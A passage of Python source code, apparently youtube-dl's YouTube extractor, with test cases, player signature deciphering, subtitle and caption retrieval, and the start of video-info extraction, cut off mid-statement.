'description': 'md5:dc7872fb300e143831327f1bae3af010',
},
'playlist': [{
'info_dict': {
'id': 'jqWvoWXjCVs',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (Main Camera)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7335,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': '6h8e8xoXJzg',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (kreestuh)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'PUOgX5z9xZw',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (grizzle)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'teuwxikvS5k',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (zim)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7334,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}],
'params': {
'skip_download': True,
},
},
{
# Multifeed video with comma in title (see https://github.com/rg3/youtube-dl/issues/8536)
'url': 'https://www.youtube.com/watch?v=gVfLd0zydlo',
'info_dict': {
'id': 'gVfLd0zydlo',
'title': 'DevConf.cz 2016 Day 2 Workshops 1 14:00 - 15:30',
},
'playlist_count': 2,
'skip': 'Not multifeed anymore',
},
{
'url': 'https://vid.plus/FlRa-iH7PGw',
'only_matching': True,
},
{
'url': 'https://zwearz.com/watch/9lWxNJF-ufM/electra-woman-dyna-girl-official-trailer-grace-helbig.html',
'only_matching': True,
},
{
# Title with JS-like syntax "};" (see https://github.com/rg3/youtube-dl/issues/7468)
# Also tests cut-off URL expansion in video description (see
# https://github.com/rg3/youtube-dl/issues/1892,
# https://github.com/rg3/youtube-dl/issues/8164)
'url': 'https://www.youtube.com/watch?v=lsguqyKfVQg',
'info_dict': {
'id': 'lsguqyKfVQg',
'ext': 'mp4',
'title': '{dark walk}; Loki/AC/Dishonored; collab w/Elflover21',
'alt_title': 'Dark Walk - Position Music',
'description': 'md5:8085699c11dc3f597ce0410b0dcbb34a',
'duration': 133,
'upload_date': '20151119',
'uploader_id': 'IronSoulElf',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IronSoulElf',
'uploader': 'IronSoulElf',
'license': 'Standard YouTube License',
'creator': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
'track': 'Dark Walk - Position Music',
'artist': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
},
'params': {
'skip_download': True,
},
},
{
# Tags with '};' (see https://github.com/rg3/youtube-dl/issues/7468)
'url': 'https://www.youtube.com/watch?v=Ms7iBXnlUO8',
'only_matching': True,
},
{
# Video with yt:stretch=17:0
'url': 'https://www.youtube.com/watch?v=Q39EVAstoRM',
'info_dict': {
'id': 'Q39EVAstoRM',
'ext': 'mp4',
'title': 'Clash Of Clans#14 Dicas De Ataque Para CV 4',
'description': 'md5:ee18a25c350637c8faff806845bddee9',
'upload_date': '20151107',
'uploader_id': 'UCCr7TALkRbo3EtFzETQF1LA',
'uploader': 'CH GAMER DROID',
},
'params': {
'skip_download': True,
},
'skip': 'This video does not exist.',
},
{
# Video licensed under Creative Commons
'url': 'https://www.youtube.com/watch?v=M4gD1WSo5mA',
'info_dict': {
'id': 'M4gD1WSo5mA',
'ext': 'mp4',
'title': 'md5:e41008789470fc2533a3252216f1c1d1',
'description': 'md5:a677553cf0840649b731a3024aeff4cc',
'duration': 721,
'upload_date': '20150127',
'uploader_id': 'BerkmanCenter',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/BerkmanCenter',
'uploader': 'The Berkman Klein Center for Internet & Society',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
# Channel-like uploader_url
'url': 'https://www.youtube.com/watch?v=eQcmzGIKrzg',
'info_dict': {
'id': 'eQcmzGIKrzg',
'ext': 'mp4',
'title': 'Democratic Socialism and Foreign Policy | Bernie Sanders',
'description': 'md5:dda0d780d5a6e120758d1711d062a867',
'duration': 4060,
'upload_date': '20151119',
'uploader': 'Bernie Sanders',
'uploader_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?feature=player_embedded&amp;v=V36LpHqtcDY',
'only_matching': True,
},
{
# YouTube Red paid video (https://github.com/rg3/youtube-dl/issues/10059)
'url': 'https://www.youtube.com/watch?v=i1Ko8UG-Tdo',
'only_matching': True,
},
{
# Rental video preview
'url': 'https://www.youtube.com/watch?v=yYr8q0y5Jfg',
'info_dict': {
'id': 'uGpuVWrhIzE',
'ext': 'mp4',
'title': 'Piku - Trailer',
'description': 'md5:c36bd60c3fd6f1954086c083c72092eb',
'upload_date': '20150811',
'uploader': 'FlixMatrix',
'uploader_id': 'FlixMatrixKaravan',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/FlixMatrixKaravan',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# YouTube Red video with episode data
'url': 'https://www.youtube.com/watch?v=iqKdEhx-dD4',
'info_dict': {
'id': 'iqKdEhx-dD4',
'ext': 'mp4',
'title': 'Isolation - Mind Field (Ep 1)',
'description': 'md5:25b78d2f64ae81719f5c96319889b736',
'duration': 2085,
'upload_date': '20170118',
'uploader': 'Vsauce',
'uploader_id': 'Vsauce',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Vsauce',
'license': 'Standard YouTube License',
'series': 'Mind Field',
'season_number': 1,
'episode_number': 1,
},
'params': {
'skip_download': True,
},
'expected_warnings': [
'Skipping DASH manifest',
],
},
{
# The following content has been identified by the YouTube community
# as inappropriate or offensive to some audiences.
'url': 'https://www.youtube.com/watch?v=6SJNVb0GnPI',
'info_dict': {
'id': '6SJNVb0GnPI',
'ext': 'mp4',
'title': 'Race Differences in Intelligence',
'description': 'md5:5d161533167390427a1f8ee89a1fc6f1',
'duration': 965,
'upload_date': '20140124',
'uploader': 'New Century Foundation',
'uploader_id': 'UCEJYpZGqgUob0zVVEaLhvVg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCEJYpZGqgUob0zVVEaLhvVg',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
},
{
# itag 212
'url': '1t24XAntNCY',
'only_matching': True,
},
{
# geo restricted to JP
'url': 'sJL6WA-aGkQ',
'only_matching': True,
},
{
'url': 'https://www.youtube.com/watch?v=MuAGGZNfUkU&list=RDMM',
'only_matching': True,
},
]
def __init__(self, *args, **kwargs):
super(YoutubeIE, self).__init__(*args, **kwargs)
self._player_cache = {}
def report_video_info_webpage_download(self, video_id):
"""Report attempt to download video info webpage."""
self.to_screen('%s: Downloading video info webpage' % video_id)
def report_information_extraction(self, video_id):
"""Report attempt to extract video information."""
self.to_screen('%s: Extracting video information' % video_id)
def report_unavailable_format(self, video_id, format):
"""Report extracted video URL."""
self.to_screen('%s: Format %s not available' % (video_id, format))
def report_rtmp_download(self):
"""Indicate the download will use the RTMP protocol."""
self.to_screen('RTMP download detected')
def _signature_cache_id(self, example_sig):
""" Return a string representation of a signature """
return '.'.join(compat_str(len(part)) for part in example_sig.split('.'))
def _extract_signature_function(self, video_id, player_url, example_sig):
id_m = re.match(
r'.*?-(?P<id>[a-zA-Z0-9_-]+)(?:/watch_as3|/html5player(?:-new)?|(?:/[a-z]{2}_[A-Z]{2})?/base)?\.(?P<ext>[a-z]+)$',
player_url)
if not id_m:
raise ExtractorError('Cannot identify player %r' % player_url)
player_type = id_m.group('ext')
player_id = id_m.group('id')
# Read from filesystem cache
func_id = '%s_%s_%s' % (
player_type, player_id, self._signature_cache_id(example_sig))
assert os.path.basename(func_id) == func_id
cache_spec = self._downloader.cache.load('youtube-sigfuncs', func_id)
if cache_spec is not None:
return lambda s: ''.join(s[i] for i in cache_spec)
download_note = (
'Downloading player %s' % player_url
if self._downloader.params.get('verbose') else
'Downloading %s player %s' % (player_type, player_id)
)
if player_type == 'js':
code = self._download_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
res = self._parse_sig_js(code)
elif player_type == 'swf':
urlh = self._request_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
code = urlh.read()
res = self._parse_sig_swf(code)
else:
assert False, 'Invalid player type %r' % player_type
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = res(test_string)
cache_spec = [ord(c) for c in cache_res]
self._downloader.cache.store('youtube-sigfuncs', func_id, cache_spec)
return res
def _print_sig_code(self, func, example_sig):
def gen_sig_code(idxs):
def _genslice(start, end, step):
starts = '' if start == 0 else str(start)
ends = (':%d' % (end + step)) if end + step >= 0 else ':'
steps = '' if step == 1 else (':%d' % step)
return 's[%s%s%s]' % (starts, ends, steps)
step = None
# Quelch pyflakes warnings - start will be set when step is set
start = '(Never used)'
for i, prev in zip(idxs[1:], idxs[:-1]):
if step is not None:
if i - prev == step:
continue
yield _genslice(start, prev, step)
step = None
continue
if i - prev in [-1, 1]:
step = i - prev
start = prev
continue
else:
yield 's[%d]' % prev
if step is None:
yield 's[%d]' % i
else:
yield _genslice(start, i, step)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = func(test_string)
cache_spec = [ord(c) for c in cache_res]
expr_code = ' + '.join(gen_sig_code(cache_spec))
signature_id_tuple = '(%s)' % (
', '.join(compat_str(len(p)) for p in example_sig.split('.')))
code = ('if tuple(len(p) for p in s.split(\'.\')) == %s:\n'
' return %s\n') % (signature_id_tuple, expr_code)
self.to_screen('Extracted signature function:\n' + code)
def _parse_sig_js(self, jscode):
funcname = self._search_regex(
(r'(["\'])signature\1\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\.sig\|\|(?P<sig>[a-zA-Z0-9$]+)\(',
r'yt\.akamaized\.net/\)\s*\|\|\s*.*?\s*c\s*&&\s*d\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*d\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\('),
jscode, 'Initial JS player signature function name', group='sig')
jsi = JSInterpreter(jscode)
initial_function = jsi.extract_function(funcname)
return lambda s: initial_function([s])
def _parse_sig_swf(self, file_contents):
swfi = SWFInterpreter(file_contents)
TARGET_CLASSNAME = 'SignatureDecipher'
searched_class = swfi.extract_class(TARGET_CLASSNAME)
initial_function = swfi.extract_function(searched_class, 'decipher')
return lambda s: initial_function([s])
def _decrypt_signature(self, s, video_id, player_url, age_gate=False):
"""Turn the encrypted s field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt signature without player_url')
if player_url.startswith('//'):
player_url = 'https:' + player_url
elif not re.match(r'https?://', player_url):
player_url = compat_urlparse.urljoin(
'https://www.youtube.com', player_url)
try:
player_id = (player_url, self._signature_cache_id(s))
if player_id not in self._player_cache:
func = self._extract_signature_function(
video_id, player_url, s
)
self._player_cache[player_id] = func
func = self._player_cache[player_id]
if self._downloader.params.get('youtube_print_sig_code'):
self._print_sig_code(func, s)
return func(s)
except Exception as e:
tb = traceback.format_exc()
raise ExtractorError(
'Signature extraction failed: ' + tb, cause=e)
def _get_subtitles(self, video_id, webpage):
try:
subs_doc = self._download_xml(
'https://video.google.com/timedtext?hl=en&type=list&v=%s' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
sub_lang_list = {}
for track in subs_doc.findall('track'):
lang = track.attrib['lang_code']
if lang in sub_lang_list:
continue
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': lang,
'v': video_id,
'fmt': ext,
'name': track.attrib['name'].encode('utf-8'),
})
sub_formats.append({
'url': 'https://www.youtube.com/api/timedtext?' + params,
'ext': ext,
})
sub_lang_list[lang] = sub_formats
if not sub_lang_list:
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
return sub_lang_list
def _get_ytplayer_config(self, video_id, webpage):
patterns = (
# User data may contain arbitrary character sequences that may affect
# JSON extraction with regex, e.g. when '};' is contained the second
# regex won't capture the whole JSON. Yet working around by trying more
# concrete regex first keeping in mind proper quoted string handling
# to be implemented in future that will replace this workaround (see
# https://github.com/rg3/youtube-dl/issues/7468,
# https://github.com/rg3/youtube-dl/pull/7599)
r';ytplayer\.config\s*=\s*({.+?});ytplayer',
r';ytplayer\.config\s*=\s*({.+?});',
)
config = self._search_regex(
patterns, webpage, 'ytplayer.config', default=None)
if config:
return self._parse_json(
uppercase_escape(config), video_id, fatal=False)
def _get_automatic_captions(self, video_id, webpage):
"""We need the webpage for getting the captions url, pass it as an
argument to speed up the process."""
self.to_screen('%s: Looking for automatic captions' % video_id)
player_config = self._get_ytplayer_config(video_id, webpage)
err_msg = 'Couldn\'t find automatic captions for %s' % video_id
if not player_config:
self._downloader.report_warning(err_msg)
return {}
try:
args = player_config['args']
caption_url = args.get('ttsurl')
if caption_url:
timestamp = args['timestamp']
# We get the available subtitles
list_params = compat_urllib_parse_urlencode({
'type': 'list',
'tlangs': 1,
'asrs': 1,
})
list_url = caption_url + '&' + list_params
caption_list = self._download_xml(list_url, video_id)
original_lang_node = caption_list.find('track')
if original_lang_node is None:
self._downloader.report_warning('Video doesn\'t have automatic captions')
return {}
original_lang = original_lang_node.attrib['lang_code']
caption_kind = original_lang_node.attrib.get('kind', '')
sub_lang_list = {}
for lang_node in caption_list.findall('target'):
sub_lang = lang_node.attrib['lang_code']
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': original_lang,
'tlang': sub_lang,
'fmt': ext,
'ts': timestamp,
'kind': caption_kind,
})
sub_formats.append({
'url': caption_url + '&' + params,
'ext': ext,
})
sub_lang_list[sub_lang] = sub_formats
return sub_lang_list
def make_captions(sub_url, sub_langs):
parsed_sub_url = compat_urllib_parse_urlparse(sub_url)
caption_qs = compat_parse_qs(parsed_sub_url.query)
captions = {}
for sub_lang in sub_langs:
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
caption_qs.update({
'tlang': [sub_lang],
'fmt': [ext],
})
sub_url = compat_urlparse.urlunparse(parsed_sub_url._replace(
query=compat_urllib_parse_urlencode(caption_qs, True)))
sub_formats.append({
'url': sub_url,
'ext': ext,
})
captions[sub_lang] = sub_formats
return captions
# New captions format as of 22.06.2017
player_response = args.get('player_response')
if player_response and isinstance(player_response, compat_str):
player_response = self._parse_json(
player_response, video_id, fatal=False)
if player_response:
renderer = player_response['captions']['playerCaptionsTracklistRenderer']
base_url = renderer['captionTracks'][0]['baseUrl']
sub_lang_list = []
for lang in renderer['translationLanguages']:
lang_code = lang.get('languageCode')
if lang_code:
sub_lang_list.append(lang_code)
return make_captions(base_url, sub_lang_list)
# Some videos don't provide ttsurl but rather caption_tracks and
# caption_translation_languages (e.g. 20LmZk1hakA)
# Does not used anymore as of 22.06.2017
caption_tracks = args['caption_tracks']
caption_translation_languages = args['caption_translation_languages']
caption_url = compat_parse_qs(caption_tracks.split(',')[0])['u'][0]
sub_lang_list = []
for lang in caption_translation_languages.split(','):
lang_qs = compat_parse_qs(compat_urllib_parse_unquote_plus(lang))
sub_lang = lang_qs.get('lc', [None])[0]
if sub_lang:
sub_lang_list.append(sub_lang)
return make_captions(caption_url, sub_lang_list)
# An extractor error can be raise by the download process if there are
# no automatic captions but there are subtitles
except (KeyError, IndexError, ExtractorError):
self._downloader.report_warning(err_msg)
return {}
def _mark_watched(self, video_id, video_info):
playback_url = video_info.get('videostats_playback_base_url', [None])[0]
if not playback_url:
return
parsed_playback_url = compat_urlparse.urlparse(playback_url)
qs = compat_urlparse.parse_qs(parsed_playback_url.query)
# cpn generation algorithm is reverse engineered from base.js.
# In fact it works even with dummy cpn.
CPN_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_'
cpn = ''.join((CPN_ALPHABET[random.randint(0, 256) & 63] for _ in range(0, 16)))
qs.update({
'ver': ['2'],
'cpn': [cpn],
})
playback_url = compat_urlparse.urlunparse(
parsed_playback_url._replace(query=compat_urllib_parse_urlencode(qs, True)))
self._download_webpage(
playback_url, video_id, 'Marking watched',
'Unable to mark watched', fatal=False)
@staticmethod
def _extract_urls(webpage):
# Embedded YouTube player
entries = [
unescapeHTML(mobj.group('url'))
for mobj in re.finditer(r'''(?x)
(?:
<iframe[^>]+?src=|
data-video-url=|
<embed[^>]+?src=|
embedSWF\(?:\s*|
<object[^>]+data=|
new\s+SWFObject\(
)
(["\'])
(?P<url>(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/
(?:embed|v|p)/[0-9A-Za-z_-]{11}.*?)
\1''', webpage)]
# lazyYT YouTube embed
entries.extend(list(map(
unescapeHTML,
re.findall(r'class="lazyYT" data-youtube-id="([^"]+)"', webpage))))
# Wordpress "YouTube Video Importer" plugin
matches = re.findall(r'''(?x)<div[^>]+
class=(?P<q1>[\'"])[^\'"]*\byvii_single_video_player\b[^\'"]*(?P=q1)[^>]+
data-video_id=(?P<q2>[\'"])([^\'"]+)(?P=q2)''', webpage)
entries.extend(m[-1] for m in matches)
return entries
@staticmethod
def _extract_url(webpage):
urls = YoutubeIE._extract_urls(webpage)
return urls[0] if urls else None
@classmethod
def extract_id(cls, url):
mobj = re.match(cls._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
video_id = mobj.group(2)
return video_id
def _extract_annotations(self, video_id):
url = 'https://www.youtube.com/annotations_invideo?features=1&legacy=1&video_id=%s' % video_id
return self._download_webpage(url, video_id, note='Searching for annotations.', errnote='Unable to download video annotations.')
@staticmethod
def _extract_chapters(description, duration):
if not description:
return None
chapter_lines = re.findall(
r'(?:^|<br\s*/>)([^<]*<a[^>]+onclick=["\']yt\.www\.watch\.player\.seekTo[^>]+>(\d{1,2}:\d{1,2}(?::\d{1,2})?)</a>[^>]*)(?=$|<br\s*/>)',
description)
if not chapter_lines:
return None
chapters = []
for next_num, (chapter_line, time_point) in enumerate(
chapter_lines, start=1):
start_time = parse_duration(time_point)
if start_time is None:
continue
if start_time > duration:
break
end_time = (duration if next_num == len(chapter_lines)
else parse_duration(chapter_lines[next_num][1]))
if end_time is None:
continue
if end_time > duration:
end_time = duration
if start_time > end_time:
break
chapter_title = re.sub(
r'<a[^>]+>[^<]+</a>', '', chapter_line).strip(' \t-')
chapter_title = re.sub(r'\s+', ' ', chapter_title)
chapters.append({
'start_time': start_time,
'end_time': end_time,
'title': chapter_title,
})
return chapters
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
proto = (
'http' if self._downloader.params.get('prefer_insecure', False)
else 'https')
start_time = None
end_time = None
parsed_url = compat_urllib_parse_urlparse(url)
for component in [parsed_url.fragment, parsed_url.query]:
query = compat_parse_qs(component)
if start_time is None and 't' in query:
start_time = parse_duration(query['t'][0])
if start_time is None and 'start' in query:
start_time = parse_duration(query['start'][0])
if end_time is None and 'end' in query:
end_time = parse_duration(query['end'][0])
# Extract original video URL from URL with redirection, like age verification, using next_url parameter
mobj = re.search(self._NEXT_URL_RE, url)
if mobj:
url = proto + '://www.youtube.com/' + compat_urllib_parse_unquote(mobj.group(1)).lstrip('/')
video_id = self.extract_id(url)
# Get video webpage
url = proto + '://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999' % video_id
video_webpage = self._download_webpage(url, video_id)
# Attempt to extract SWF player URL
mobj = re.search(r'swfConfig.*?"(https?:\\/\\/.*?watch.*?-.*?\.swf)"', video_webpage)
if mobj is not None:
player_url = re.sub(r'\\(.)', r'\1', mobj.group(1))
else:
player_url = None
dash_mpds = []
def add_dash_mpd(video_info):
dash_mpd = video_info.get('dashmpd')
if dash_mpd and dash_mpd[0] not in dash_mpds:
dash_mpds.append(dash_mpd[0])
is_live = None
view_count = None
def extract_view_count(v_info):
return int_or_none(try_get(v_info, lambda x: x['view_count'][0]))
# Get video info
embed_webpage = None
if re.search(r'player-age-gate-content">', video_webpage) is not None:
age_gate = True
# We simulate the access to the video from www.youtube.com/v/{video_id}
# this can be viewed without login into Youtube
url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(url, video_id, 'Downloading embed webpage')
data = compat_urllib_parse_urlencode({
'video_id': video_id,
'eurl': 'https://youtube.googleapis.com/v/' + video_id,
'sts': self._search_regex(
r'"sts"\s*:\s*(\d+)', embed_webpage, 'sts', default=''),
})
video_info_url = proto + '://www.youtube.com/get_video_info?' + data
video_info_webpage = self._download_webpage(
video_info_url, video_id,
note='Refetching age-gated info webpage',
errnote='unable to download video info webpage')
video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(video_info)
else:
age_gate = False
video_info = None
sts = None
# Try looking directly into the video webpage
ytplayer_config = self._get_ytplayer_config(video_id, video_webpage)
if ytplayer_config:
args = ytplayer_config['args']
if args.get('url_encoded_fmt_stream_map') or args.get('hlsvp'):
# Convert to the same format returned by compat_parse_qs
video_info = dict((k, [v]) for k, v in args.items())
add_dash_mpd(video_info)
# Rental video is not rented but preview is available (e.g.
# https://www.youtube.com/watch?v=yYr8q0y5Jfg,
# https://github.com/rg3/youtube-dl/issues/10532)
if not video_info and args.get('ypc_vid'):
return self.url_result(
args['ypc_vid'], YoutubeIE.ie_key(), video_id=args['ypc_vid'])
if args.get('livestream') == '1' or args.get('live_playback') == 1:
is_live = True
sts = ytplayer_config.get('sts')
if not video_info or self._downloader.params.get('youtube_include_dash_manifest', True):
# We also try looking in get_video_info since it may contain different dashmpd
# URL that points to a DASH manifest with possibly different itag set (some itags
# are missing from DASH manifest pointed by webpage's dashmpd, some - from DASH
# manifest pointed by get_video_info's dashmpd).
# The general idea is to take a union of itags of both DASH manifests (for example
# video with such 'manifest behavior' see https://github.com/rg3/youtube-dl/issues/6093)
self.report_video_info_webpage_download(video_id)
for el in ('info', 'embedded', 'detailpage', 'vevo', ''):
query = {
'video_id': video_id,
'ps': 'default',
'eurl': '',
'gl': 'US',
'hl': 'en',
}
if el:
query['el'] = el
if sts:
query['sts'] = sts
video_info_webpage = self._download_webpage(
'%s://www.youtube.com/get_video_info' % proto,
video_id, note=False,
errnote='unable to download video info webpage',
fatal=False, query=query)
if not video_info_webpage:
continue
get_video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(get_video_info)
if view_count is None:
view_count = extract_view_count(get_video_info)
if not video_info:
video_info = get_video_info
if 'token' in get_video_info:
# Different get_video_info requests may report different results, e.g.
# some may report video unavailability, but some may serve it without
# any complaint (see https://github.com/rg3/youtube-dl/issues/7362,
# the original webpage as well as el=info and el=embedded get_video_info
# requests report video unavailability due to geo restriction while
# el=detailpage succeeds and returns valid data). This is probably
# due to YouTube measures against IP ranges of hosting providers.
# Working around by preferring the first succeeded video_info containing
# the token if no such video_info yet was found.
if 'token' not in video_info:
video_info = get_video_info
break
def extract_unavailable_message():
return self._html_search_regex(
r'(?s)<h1[^>]+id="unavailable-message"[^>]*>(.+?)</h1>',
video_webpage, 'unavailable message', default=None)
if 'token' not in video_info:
if 'reason' in video_info:
if 'The uploader has not made this video available in your country.' in video_info['reason']:
regions_allowed = self._html_search_meta(
'regionsAllowed', video_webpage, default=None)
countries = regions_allowed.split(',') if regions_allowed else None
self.raise_geo_restricted(
msg=video_info['reason'][0], countries=countries)
reason = video_info['reason'][0]
if 'Invalid parameters' in reason:
unavailable_message = extract_unavailable_message()
if unavailable_message:
reason = unavailable_message
raise ExtractorError(
'YouTube said: %s' % reason,
expected=True, video_id=video_id)
else:
raise ExtractorError(
'"token" parameter not in video info for unknown reason',
video_id=video_id)
# title
if 'title' in video_info:
video_title = video_info['title'][0]
else:
self._downloader.report_warning('Unable to extract video title')
video_title = '_'
# description
description_original = video_description = get_element_by_id("eow-description", video_webpage)
if video_description:
def replace_url(m):
redir_url = compat_urlparse.urljoin(url, m.group(1))
parsed_redir_url = compat_urllib_parse_urlparse(redir_url)
if re.search(r'^(?:www\.)?(?:youtube(?:-nocookie)?\.com|youtu\.be)$', parsed_redir_url.netloc) and parsed_redir_url.path == '/redirect':
qs = compat_parse_qs(parsed_redir_url.query)
q = qs.get('q')
if q and q[0]:
return q[0]
return redir_url
description_original = video_description = re.sub(r'''(?x)
<a\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
(?:title|href)="([^"]+)"\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
class="[^"]*"[^>]*>
[^<]+\.{3}\s*
</a>
''', replace_url, video_description)
video_description = clean_html(video_description)
else:
fd_mobj = re.search(r'<meta name="description" content="([^"]+)"', video_webpage)
if fd_mobj:
video_description = unescapeHTML(fd_mobj.group(1))
else:
video_description = ''
if 'multifeed_metadata_list' in video_info and not smuggled_data.get('force_singlefeed', False):
if not self._downloader.params.get('noplaylist'):
entries = []
feed_ids = []
multifeed_metadata_list = video_info['multifeed_metadata_list'][0]
for feed in multifeed_metadata_list.split(','):
# Unquote should take place before split on comma (,) since textual
# fields may contain comma as well (see
# https://github.com/rg3/youtube-dl/issues/8536)
feed_data = compat_parse_qs(compat_urllib_parse_unquote_plus(feed))
entries.append({
'_type': 'url_transparent',
'ie_key': 'Youtube',
'url': smuggle_url(
'%s://www.youtube.com/watch?v=%s' % (proto, feed_data['id'][0]),
{'force_singlefeed': True}),
'title': '%s (%s)' % (video_title, feed_data['title'][0]),
})
feed_ids.append(feed_data['id'][0])
self.to_screen(
'Downloading multifeed video (%s) - add --no-playlist to just download video %s'
% (', '.join(feed_ids), video_id))
return self.playlist_result(entries, video_id, video_title, video_description)
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
if view_count is None:
view_count = extract_view_count(video_info)
# Check for "rental" videos
if 'ypc_video_rental_bar_text' in video_info and 'author' not in video_info:
raise ExtractorError('"rental" videos not supported. See https://github.com/rg3/youtube-dl/issues/359 for more information.', expected=True)
def _extract_filesize(media_url):
return int_or_none(self._search_regex(
r'\bclen[=/](\d+)', media_url, 'filesize', default=None))
if 'conn' in video_info and video_info['conn'][0].startswith('rtmp'):
self.report_rtmp_download()
formats = [{
'format_id': '_rtmp',
'protocol': 'rtmp',
'url': video_info['conn'][0],
'player_url': player_url,
}]
elif not is_live and (len(video_info.get('url_encoded_fmt_stream_map', [''])[0]) >= 1 or len(video_info.get('adaptive_fmts', [''])[0]) >= 1):
encoded_url_map = video_info.get('url_encoded_fmt_stream_map', [''])[0] + ',' + video_info.get('adaptive_fmts', [''])[0]
if 'rtmpe%3Dyes' in encoded_url_map:
raise ExtractorError('rtmpe downloads are not supported, see https://github.com/rg3/youtube-dl/issues/343 for more information.', expected=True)
formats_spec = {}
fmt_list = video_info.get('fmt_list', [''])[0]
if fmt_list:
for fmt in fmt_list.split(','):
spec = fmt.split('/')
if len(spec) > 1:
width_height = spec[1].split('x')
if len(width_height) == 2:
formats_spec[spec[0]] = {
'resolution': spec[1],
'width': int_or_none(width_height[0]),
'height': int_or_none(width_height[1]),
}
q = qualities(['small', 'medium', 'hd720'])
formats = []
for url_data_str in encoded_url_map.split(','):
url_data = compat_parse_qs(url_data_str)
if 'itag' not in url_data or 'url' not in url_data:
continue
format_id = url_data['itag'][0]
url = url_data['url'][0]
if 's' in url_data or self._downloader.params.get('youtube_include_dash_manifest', True):
ASSETS_RE = r'"assets":.+?"js":\s*("[^"]+")'
jsplayer_url_json = self._search_regex(
ASSETS_RE,
embed_webpage if age_gate else video_webpage,
'JS player URL (1)', default=None)
if not jsplayer_url_json and not age_gate:
# We need the embed website after all
if embed_webpage is None:
embed_url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(
embed_url, video_id, 'Downloading embed webpage')
jsplayer_url_json = self._search_regex(
ASSETS_RE, embed_webpage, 'JS player URL')
player_url = json.loads(jsplayer_url_json)
if player_url is None:
player_url_json = self._search_regex(
r'ytplayer\.config.*?"url"\s*:\s*("[^"]+")',
video_webpage, 'age gate player URL')
player_url = json.loads(player_url_json)
if 'sig' in url_data:
url += '&signature=' + url_data['sig'][0]
elif 's' in url_data:
encrypted_sig = url_data['s'][0]
if self._downloader.params.get('verbose'):
if player_url is None:
player_version = 'unknown'
player_desc = 'unknown'
else:
if player_url.endswith('swf'):
player_version = self._search_regex(
r'-(.+?)(?:/watch_as3)?\.swf$', player_url,
'flash player', fatal=False)
player_desc = 'flash player %s' % player_version
else:
player_version = self._search_regex(
[r'html5player-([^/]+?)(?:/html5player(?:-new)?)?\.js',
r'(?:www|player)-([^/]+)(?:/[a-z]{2}_[A-Z]{2})?/base\.js'],
player_url,
'html5 player', fatal=False)
player_desc = 'html5 player %s' % player_version
parts_sizes = self._signature_cache_id(encrypted_sig)
self.to_screen('{%s} signature length %s, %s' %
